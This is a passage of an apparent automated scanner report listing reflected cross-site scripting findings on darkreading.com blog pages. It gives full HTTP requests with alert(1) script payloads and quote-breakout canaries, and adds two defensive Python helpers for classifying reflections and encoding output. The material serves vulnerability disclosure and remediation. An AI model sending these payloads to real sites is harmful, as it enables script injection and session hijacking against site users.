Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70b79'%3bc6ce1495d76 was submitted in the REST URL parameter 3. This input was echoed as 70b79';c6ce1495d76 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/cs-island70b79'%3bc6ce1495d76/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1afcd"><script>alert(1)</script>390ea43a200 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/cs-island1afcd"><script>alert(1)</script>390ea43a200/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ding.com%2Fblog%2Farchives%2Fcs-island1afcd%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E390ea43a200%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/cs-island1afcd"><script>alert(1)</script>390ea43a200/index.html"> ...[SNIP]...
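The two reflection contexts this report keeps naming, a double-quoted HTML attribute value (the login link above, where the path is echoed into successfulLoginRedirect="...") and a single-quoted JavaScript string (the ad-server script tag shown in later findings for the same site), are what decide which canary breaks out: "><script>... for the first, '; for the second. The Python helper below is an added example, not part of the scanner output or of the site's code. Given a response body and the canary that was sent, it reports whether the canary came back unmodified and which syntactic context it landed in, which is the triage step a tester performs before deciding whether a finding is a full proof of concept or only a "terminates the string" result. The response bodies it runs on are constructed fixtures modelled on the snipped responses in this report; the /login path, the surrounding tags and the "Log in" text are assumptions, since the real pages are snipped.

```python
import html
from typing import Optional
from urllib.parse import quote


def _quote_state(text: str, js_escapes: bool) -> Optional[str]:
    """Return the quote character still open at the end of text, or None.

    Used for the attribute part of an HTML start tag and for script source;
    js_escapes turns on backslash handling inside JavaScript string literals.
    """
    state = None
    i = 0
    while i < len(text):
        ch = text[i]
        if js_escapes and state and ch == "\\":
            i += 2                      # skip the escaped character
            continue
        if ch in "'\"":
            if state is None:
                state = ch
            elif state == ch:
                state = None            # a different quote inside a string is literal
        i += 1
    return state


def classify_reflection(body: str, payload: str) -> str:
    """Report whether payload is echoed unmodified and the context it lands in."""
    idx = body.find(payload)
    if idx == -1:
        # echoed, but entity-encoded: the defence worked for this context
        if html.escape(payload, quote=True) in body or html.escape(payload) in body:
            return "reflected-encoded"
        return "not-reflected"
    before = body[:idx]
    lower = before.lower()
    open_script = lower.rfind("<script")
    if open_script > lower.rfind("</script"):
        # inside a script block: scan the JS source between the tag and the echo
        source = before[before.find(">", open_script) + 1:]
        q = _quote_state(source, js_escapes=True)
        return {None: "script-code", "'": "script-string-single-quoted",
                '"': "script-string-double-quoted"}[q]
    tag_open = before.rfind("<")
    if tag_open > before.rfind(">"):
        # inside a start tag: which attribute quote, if any, is still open?
        q = _quote_state(before[tag_open:], js_escapes=False)
        return {None: "tag-unquoted", "'": "attribute-single-quoted",
                '"': "attribute-double-quoted"}[q]
    return "html-text"


# Constructed fixtures modelled on the report's responses (surrounding markup is
# reconstructed, not copied; the /login path is an assumption).
ATTR_CANARY = '1afcd"><script>alert(1)</script>390ea43a200'
ATTR_PATH = "/blog/archives/cs-island" + ATTR_CANARY + "/index.html"
ATTR_BODY = (
    "<html><head><title></title></head><body>"
    '<a href="/login?service=' + quote("http://www.darkreading.com" + ATTR_PATH, safe="")
    + "&siteId=300001&successfulLoginRedirect=http://www.darkreading.com" + ATTR_PATH
    + '">Log in</a></body></html>'
)
# What the same page would look like if the path were HTML-attribute-encoded.
ENCODED_BODY = ATTR_BODY.replace(ATTR_CANARY, html.escape(ATTR_CANARY, quote=True))

JS_CANARY = "42239';7062af589c1"
JS_PATH = "/blog/archives/dark-dominion" + JS_CANARY + "/index"
SCRIPT_BODY = (
    "<html><head><title></title></head><body>"
    "<script type=\"text/javascript\">document.write('<scr'+'ipt language=\"javascript1.1\" "
    "src=\"http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;"
    "alias=DarkReading_Blogs_WelcomeAd_1x1;key=" + JS_PATH
    + ";misc='+new Date().getTime()+'\">');</script></body></html>"
)


if __name__ == "__main__":
    for name, body, canary in (("login link", ATTR_BODY, ATTR_CANARY),
                               ("encoded login link", ENCODED_BODY, ATTR_CANARY),
                               ("ad script", SCRIPT_BODY, JS_CANARY)):
        print(name, "->", classify_reflection(body, canary))
```

The classifier deliberately looks only at the text before the first raw occurrence of the canary, so the payload's own <script> tag never influences the verdict; the percent-encoded copy of the path that the login link also carries is not a raw match and is ignored, which mirrors the report's "echoed unmodified" wording.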
3.406. http://www.darkreading.com/blog/archives/cs-island/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/cs-island/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c187"><script>alert(1)</script>1285d44a994 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/cs-island/index.html?2c187"><script>alert(1)</script>1285d44a994=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d930"><script>alert(1)</script>1a1bb26cd95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/dark-dominion6d930"><script>alert(1)</script>1a1bb26cd95/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42239'%3b7062af589c1 was submitted in the REST URL parameter 3. This input was echoed as 42239';7062af589c1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/dark-dominion42239'%3b7062af589c1/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/dark-dominion42239';7062af589c1/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292114128;misc='+new Date().getTime()+'"> ...[SNIP]...
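The response above shows the request path landing inside a single-quoted JavaScript string that is itself assembling a <script> tag, so the data crosses two parsers: the JavaScript parser first, then the HTML parser once the string is written into the document. That is why the remediation detail says to avoid the context altogether; where the value cannot be removed, it has to be encoded for both parsers, in the reverse of the order in which they decode it: HTML-attribute-encode first, then escape every non-alphanumeric character for the JavaScript string. The Python below is an added example, not code from the site or the scanner. It reproduces the sink (the '+' splices and the ad-server URL are copied from the response; the document.write wrapper is an assumption about the surrounding script, which the report snips), builds the same tag with and without the encoding, and uses a minimal string-literal scanner to check whether anything from the path escapes into executable code. The URL-decoded path and the 7062af589c1 marker are taken from the request above.

```python
import html
import re

# From the request above, URL-decoded: the %3b arrives at the sink as a literal ';'.
PATH = "/blog/archives/dark-dominion42239';7062af589c1/index"
CANARY = "7062af589c1"


def js_string_encode(s: str) -> str:
    """Encode s for placement inside a JavaScript string literal.

    Every character that is not an ASCII letter or digit becomes \\xHH (or a
    \\uHHHH escape, as a surrogate pair above U+FFFF), so no quote, backslash,
    newline or '</script' sequence can survive into the script source.
    """
    out = []
    for ch in s:
        cp = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif cp < 0x100:
            out.append("\\x%02X" % cp)
        elif cp < 0x10000:
            out.append("\\u%04X" % cp)
        else:
            v = cp - 0x10000
            out.append("\\u%04X\\u%04X" % (0xD800 + (v >> 10), 0xDC00 + (v & 0x3FF)))
    return "".join(out)


def html_attr_encode(s: str) -> str:
    """Entity-encode s for a quoted HTML attribute value (& < > double and single quote)."""
    return html.escape(s, quote=True)


def encode_for_js_string_written_as_html(s: str) -> str:
    """HTML-attribute-encode, then JS-string-encode: the browser undoes the JS
    escapes first and the HTML entities second, so the layers nest correctly."""
    return js_string_encode(html_attr_encode(s))


# Copied from the response; only the document.write wrapper is assumed.
_AD_PREFIX = ("<scr'+'ipt language=\"javascript1.1\" charset=\"utf-8\" "
              "src=\"http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;"
              "alias=DarkReading_Blogs_WelcomeAd_1x1;key=")
_AD_SUFFIX = (";kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292114128;"
              "misc='+new Date().getTime()+'\">")


def build_ad_tag_vulnerable(path: str) -> str:
    """Splices the raw path into the single-quoted string, as the site does."""
    return "document.write('" + _AD_PREFIX + path + _AD_SUFFIX + "');"


def build_ad_tag_safe(path: str) -> str:
    """Same sink, with the path encoded for both parsers it passes through."""
    return "document.write('" + _AD_PREFIX + encode_for_js_string_written_as_html(path) + _AD_SUFFIX + "');"


def code_outside_strings(js: str) -> str:
    """Return the parts of js that are NOT inside a string literal.

    Minimal scanner for ' and " literals with backslash escapes. If an injected
    marker shows up in the result, the data has broken out of its literal.
    """
    out, i, n = [], 0, len(js)
    while i < n:
        ch = js[i]
        if ch in "'\"":
            i += 1
            while i < n and js[i] != ch:
                i += 2 if js[i] == "\\" else 1   # skip escaped characters
            i += 1                                # closing quote
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def decode_as_browser(js_literal_body: str) -> str:
    """Simulate the two decodes: JS string escapes, then HTML entities."""
    def unescape(m):
        return chr(int(m.group(1) or m.group(2), 16))
    s = re.sub(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})", unescape, js_literal_body)
    s = s.encode("utf-16", "surrogatepass").decode("utf-16")  # re-join surrogate pairs
    return html.unescape(s)


if __name__ == "__main__":
    print("marker outside strings, vulnerable:", CANARY in code_outside_strings(build_ad_tag_vulnerable(PATH)))
    print("marker outside strings, safe:      ", CANARY in code_outside_strings(build_ad_tag_safe(PATH)))
```

The encoder is intentionally aggressive (every non-alphanumeric byte is escaped) rather than a quote-only blacklist, because the same sink also has to survive a closing </script> sequence and a line terminator; the round-trip through decode_as_browser shows that the aggressive encoding still delivers the original path to the attribute unchanged.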
3.409. http://www.darkreading.com/blog/archives/dark-dominion/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/dark-dominion/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9352"><script>alert(1)</script>8e802cda6aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/dark-dominion/index.html?a9352"><script>alert(1)</script>8e802cda6aa=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c839"><script>alert(1)</script>f4468a3776d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/evil-bytes6c839"><script>alert(1)</script>f4468a3776d/index.html HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8def8'%3b326e2baa0c2 was submitted in the REST URL parameter 3. This input was echoed as 8def8';326e2baa0c2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil-bytes8def8'%3b326e2baa0c2/index.html HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/evil-bytes8def8';326e2baa0c2/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292112429;misc='+new Date().getTime()+'"> ...[SNIP]...
3.412. http://www.darkreading.com/blog/archives/evil-bytes/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/evil-bytes/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57599"><script>alert(1)</script>5a3d20f284 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/evil-bytes/index.html?57599"><script>alert(1)</script>5a3d20f284=1 HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef818"><script>alert(1)</script>8452d284f79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/evil_bytesef818"><script>alert(1)</script>8452d284f79/index.html?subSection=evil_bytes HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fdfa'%3b44d0fc2211f was submitted in the REST URL parameter 3. This input was echoed as 7fdfa';44d0fc2211f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytes7fdfa'%3b44d0fc2211f/index.html?subSection=evil_bytes HTTP/1.1
Host: www.darkreading.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2fd9'%3bdb6c1ae88f3 was submitted in the REST URL parameter 3. This input was echoed as f2fd9';db6c1ae88f3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/hacked-offf2fd9'%3bdb6c1ae88f3/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db19c"><script>alert(1)</script>fc3e30266c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/hacked-offdb19c"><script>alert(1)</script>fc3e30266c0/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <meta http-equ ...[SNIP]... ng.com%2Fblog%2Farchives%2Fhacked-offdb19c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efc3e30266c0%2Findex.html&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/blog/archives/hacked-offdb19c"><script>alert(1)</script>fc3e30266c0/index.html"> ...[SNIP]...
3.417. http://www.darkreading.com/blog/archives/hacked-off/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/hacked-off/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc1bc"><script>alert(1)</script>e7f096f3529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/hacked-off/index.html?fc1bc"><script>alert(1)</script>e7f096f3529=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c331"><script>alert(1)</script>5483cb0977f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/in-search-of-malware8c331"><script>alert(1)</script>5483cb0977f/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f093'%3b3cf75386138 was submitted in the REST URL parameter 3. This input was echoed as 9f093';3cf75386138 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/in-search-of-malware9f093'%3b3cf75386138/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title></title> ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1183308/0/16/ADTECH;alias=DarkReading_Blogs_WelcomeAd_1x1;key=/blog/archives/in-search-of-malware9f093';3cf75386138/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=1292114083;misc='+new Date().getTime()+'"> ...[SNIP]...
3.420. http://www.darkreading.com/blog/archives/in-search-of-malware/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.darkreading.com
Path: /blog/archives/in-search-of-malware/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77497"><script>alert(1)</script>35a57d2cfa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/archives/in-search-of-malware/index.html?77497"><script>alert(1)</script>35a57d2cfa5=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4768"><script>alert(1)</script>3c958c8b28b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /blog/archives/security-viewse4768"><script>alert(1)</script>3c958c8b28b/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a624d'%3bf74133ddbff was submitted in the REST URL parameter 3. This input was echoed as a624d';f74133ddbff in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/security-viewsa624d'%3bf74133ddbff/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
